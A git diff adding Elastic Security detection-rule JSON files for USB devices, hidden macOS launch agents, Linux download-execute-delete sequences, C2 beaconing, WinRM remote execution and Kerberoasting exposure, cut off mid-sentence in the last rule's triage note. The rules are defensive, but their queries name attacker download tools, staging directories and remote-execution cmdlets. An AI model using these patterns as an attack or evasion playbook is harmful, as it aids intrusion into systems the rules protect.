+++ b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_4.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies newly seen removable devices by device friendly name using registry modification events. While this activity is not inherently malicious, analysts can use those events to aid monitoring for data exfiltration over those devices.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.registry-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Seen Removable Device", + "new_terms_fields": [ + "registry.path" + ], + "query": "event.category:\"registry\" and host.os.type:\"windows\" and registry.value:\"FriendlyName\" and registry.path:*USBSTOR*\n", + "references": [ + "https://winreg-kb.readthedocs.io/en/latest/sources/system-keys/USB-storage.html", + "https://learn.microsoft.com/en-us/windows-hardware/drivers/usbcon/usb-device-specific-registry-settings" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0859355c-0f08-4b43-8ff5-7d2a4789fc08", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Exfiltration", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1091", + "name": "Replication Through Removable Media", + "reference": "https://attack.mitre.org/techniques/T1091/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1052", + "name": "Exfiltration Over Physical Medium", + "reference": "https://attack.mitre.org/techniques/T1052/", + "subtechnique": [ + { + "id": "T1052.001", + "name": "Exfiltration over USB", + "reference": "https://attack.mitre.org/techniques/T1052/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 4 + }, + "id": "0859355c-0f08-4b43-8ff5-7d2a4789fc08_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_107.json b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_107.json new file mode 100644 index 00000000000..711f19c1c43 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_107.json @@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a hidden launch agent or daemon. An adversary may establish persistence by installing a new launch agent or daemon which executes at login.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation of Hidden Launch Agent or Daemon", + "query": "file where host.os.type == \"macos\" and event.type != \"deletion\" and\n file.path :\n (\n \"/System/Library/LaunchAgents/.*.plist\",\n \"/Library/LaunchAgents/.*.plist\",\n \"/Users/*/Library/LaunchAgents/.*.plist\",\n \"/System/Library/LaunchDaemons/.*.plist\",\n \"/Library/LaunchDaemons/.*.plist\"\n )\n", + "references": [ + "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "092b068f-84ac-485d-8a55-7dd9e006715f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.001", + "name": "Launch Agent", + "reference": "https://attack.mitre.org/techniques/T1543/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "092b068f-84ac-485d-8a55-7dd9e006715f_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_4.json b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_4.json new file mode 100644 index 00000000000..4145e852a3e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_4.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the creation of a file, followed by its execution and self-deletion in a short timespan within a directory often used for malicious purposes by threat actors. This behavior is often used by malware to execute malicious code and delete itself to hide its tracks.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "File Creation, Execution and Self-Deletion in Suspicious Directory", + "query": "sequence by host.id, user.id with maxspan=1m\n [file where host.os.type == \"linux\" and event.action == \"creation\" and \n process.name in (\"curl\", \"wget\", \"fetch\", \"ftp\", \"sftp\", \"scp\", \"rsync\", \"ld\") and \n file.path : (\"/dev/shm/*\", \"/run/shm/*\", \"/tmp/*\", \"/var/tmp/*\",\n \"/run/*\", \"/var/run/*\", \"/var/www/*\", \"/proc/*/fd/*\")] by file.name\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")] by process.name\n [file where host.os.type == \"linux\" and event.action == \"deletion\" and not process.name in (\"rm\", \"ld\") and \n file.path : (\"/dev/shm/*\", \"/run/shm/*\", \"/tmp/*\", \"/var/tmp/*\",\n \"/run/*\", \"/var/run/*\", \"/var/www/*\", \"/proc/*/fd/*\")] by file.name\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "09bc6c90-7501-494d-b015-5d988dc3f233", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 4 + }, + "id": "09bc6c90-7501-494d-b015-5d988dc3f233_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0ab319ef-92b8-4c7f-989b-5de93c852e93_4.json b/packages/security_detection_engine/kibana/security_rule/0ab319ef-92b8-4c7f-989b-5de93c852e93_4.json new file mode 100644 index 00000000000..c36563d0f54 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0ab319ef-92b8-4c7f-989b-5de93c852e93_4.json @@ -0,0 +1,80 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A statistical model has identified command-and-control (C2) beaconing activity with high confidence. Beaconing can help attackers maintain stealthy communication with their C2 servers, receive instructions and payloads, exfiltrate data and maintain persistence in a network.", + "from": "now-1h", + "index": [ + "ml_beaconing.all" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Statistical Model Detected C2 Beaconing Activity with High Confidence", + "query": "beacon_stats.beaconing_score: 3\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/beaconing", + "https://www.elastic.co/security-labs/identifying-beaconing-malware-using-elastic" + ], + "related_integrations": [ + { + "package": "beaconing", + "version": "^1.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "beacon_stats.beaconing_score", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "0ab319ef-92b8-4c7f-989b-5de93c852e93", + "setup": "## Setup\n\nThe rule requires the Network Beaconing Identification integration assets to be installed, as well as network logs collected by the Elastic Defend or Network Packet Capture integrations.\n\n### Network Beaconing Identification Setup\nThe Network Beaconing Identification integration consists of a statistical framework to identify C2 beaconing activity in network logs.\n\n#### Prerequisite Requirements:\n- Fleet is required for Network Beaconing Identification.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Network events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) or [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n\n#### The following steps should be executed to install assets associated with the Network Beaconing Identification integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Network Beaconing Identification and select the integration to see more details about it.\n- Under Settings, click \"Install Network Beaconing Identification assets\" and follow the prompts to install the assets.\n", + "severity": "low", + "tags": [ + "Domain: Network", + "Use Case: C2 Beaconing Detection", + "Tactic: Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1102", + "name": "Web Service", + "reference": "https://attack.mitre.org/techniques/T1102/", + "subtechnique": [ + { + "id": "T1102.002", + "name": "Bidirectional Communication", + "reference": "https://attack.mitre.org/techniques/T1102/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "0ab319ef-92b8-4c7f-989b-5de93c852e93_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_106.json b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_106.json new file mode 100644 index 00000000000..2eafcd691ef --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_106.json @@ -0,0 +1,162 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Program Files\\\\WindowsPowerShell\\\\Modules\\\\dbatools\\\\*\\\\allcommands.ps1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.directory": { + "case_insensitive": true, + "value": "?:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\*\\\\bin" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.directory": { + "case_insensitive": true, + "value": "?:\\\\ExchangeServer\\\\bin*" + } + } + } + } + ], + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Remote Execution Capabilities via WinRM", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\"Invoke-WmiMethod\" or \"Invoke-Command\" or \"Enter-PSSession\") and \"ComputerName\"\n ) and\n not user.id : \"S-1-5-18\" and\n not file.directory : (\n \"C:\\\\Program Files\\\\LogicMonitor\\\\Agent\\\\tmp\"\n ) and not\n powershell.file.script_block_text : (\n \"Export-ModuleMember -Function @('Invoke-Expression''Invoke-Command')\" and\n \"function Invoke-Command {\"\n )\n", + "references": [ + "https://attack.mitre.org/techniques/T1021/006/", + "https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/LateralMovement/PowerShellRemoting.cs", + "https://github.com/BC-SECURITY/Empire/blob/main/empire/server/modules/powershell/lateral_movement/invoke_psremoting.py" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Execution", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.006", + "name": "Windows Remote Management", + "reference": "https://attack.mitre.org/techniques/T1021/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_5.json b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_5.json new file mode 100644 index 00000000000..eb69fc30b78 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_5.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Remote Execution Capabilities via WinRM", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\"Invoke-WmiMethod\" or \"Invoke-Command\" or \"Enter-PSSession\") and \"ComputerName\"\n ) and\n not user.id : \"S-1-5-18\" and\n not file.directory : (\n \"C:\\\\Program Files\\\\LogicMonitor\\\\Agent\\\\tmp\" or\n ?\\:\\\\\\\\Program?Files\\\\\\\\Microsoft\\\\\\\\Exchange?Server\\\\\\\\*\\\\\\\\bin or\n ?\\:\\\\\\\\Logicmonitor\\\\\\\\tmp* or\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\dbatools\\\\\\\\* or\n ?\\:\\\\\\\\ExchangeServer\\\\\\\\bin*\n ) and not\n powershell.file.script_block_text : (\n \"Export-ModuleMember -Function @('Invoke-Expression''Invoke-Command')\" and\n \"function Invoke-Command {\"\n )\n", + "references": [ + "https://attack.mitre.org/techniques/T1021/006/", + "https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/LateralMovement/PowerShellRemoting.cs", + "https://github.com/BC-SECURITY/Empire/blob/main/empire/server/modules/powershell/lateral_movement/invoke_psremoting.py" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Execution", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.006", + "name": "Windows Remote Management", + "reference": "https://attack.mitre.org/techniques/T1021/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 5 + }, + "id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_6.json b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_6.json new file mode 100644 index 00000000000..6c0be09cd12 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_6.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Remote Execution Capabilities via WinRM", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\"Invoke-WmiMethod\" or \"Invoke-Command\" or \"Enter-PSSession\") and \"ComputerName\"\n ) and\n not user.id : \"S-1-5-18\" and\n not file.directory : (\n \"C:\\\\Program Files\\\\LogicMonitor\\\\Agent\\\\tmp\" or\n ?\\:\\\\\\\\Program?Files\\\\\\\\Microsoft\\\\\\\\Exchange?Server\\\\\\\\*\\\\\\\\bin or\n ?\\:\\\\\\\\Logicmonitor\\\\\\\\tmp* or\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\dbatools\\\\\\\\* or\n ?\\:\\\\\\\\ExchangeServer\\\\\\\\bin*\n ) and not\n powershell.file.script_block_text : (\n \"Export-ModuleMember -Function @('Invoke-Expression''Invoke-Command')\" and\n \"function Invoke-Command {\"\n )\n", + "references": [ + "https://attack.mitre.org/techniques/T1021/006/", + "https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/LateralMovement/PowerShellRemoting.cs", + "https://github.com/BC-SECURITY/Empire/blob/main/empire/server/modules/powershell/lateral_movement/invoke_psremoting.py" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Execution", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.006", + "name": "Windows Remote Management", + "reference": "https://attack.mitre.org/techniques/T1021/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 6 + }, + "id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_109.json b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_109.json new file mode 100644 index 00000000000..ea281092245 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_109.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a user account has the servicePrincipalName attribute modified. Attackers can abuse write privileges over a user to configure Service Principle Names (SPNs) so that they can perform Kerberoasting. Administrators can also configure this for legitimate purposes, exposing the account to Kerberoasting.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "User account exposed to Kerberoasting", + "note": "## Triage and analysis\n\n### Investigating User account exposed to Kerberoasting\n\nService Principal Names (SPNs) are names by which Kerberos clients uniquely identify service instances for Kerberos target computers.\n\nBy default, only computer accounts have SPNs, which creates no significant risk, since machine accounts have a default domain policy that rotates their passwords every 30 days, and the password is composed of 120 random characters, making them invulnerable to Kerberoasting.\n\nA user account with an SPN assigned is considered a service account, and is accessible to the entire domain. If any user in the directory requests a ticket-granting service (TGS), the domain controller will encrypt it with the secret key of the account executing the service. An attacker can potentially perform a Kerberoasting attack with this information, as the human-defined password is likely to be less complex.\n\nFor scenarios where SPNs cannot be avoided on user accounts, Microsoft provides the Group Managed Service Accounts (gMSA) feature, which ensures that account passwords are robust and changed regularly and automatically. More information can be found 